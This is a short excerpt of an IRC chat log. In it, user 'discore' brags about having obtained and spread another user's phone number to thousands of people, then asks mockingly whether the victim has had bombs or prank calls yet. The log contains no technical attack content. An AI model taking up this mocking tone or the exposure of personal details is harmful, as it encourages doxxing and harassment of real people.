[1:49] <ZeR0-HeX> but why would 14000 people want it?
<discore> for educational purposes
[1:49] <ZeR0-HeX> jeez
[1:50] <ZeR0-HeX> is uh
[1:50] <ZeR0-HeX> anyone gonna send me a bomb?
[1:50] <ZeR0-HeX> :-)
[1:50] <ZeR0-HeX> or gimme a 1000 prank calls
<discore> i hope not for your sake.
<discore> have you got anything yet?
<discore> trust me, the ppl who got these infoz could easily get your phone #, i just did it
first. teehee
[1:51] <ZeR0-HeX> what do you mean, have i got anything?
<discore> have you got any prank calls or any bombs or anything fun?
[1:51] <ZeR0-HeX> no
[1:51] <ZeR0-HeX> not yet..
[1:51] <ZeR0-HeX> :-)
[1:51] <ZeR0-HeX> hehe
<discore> then
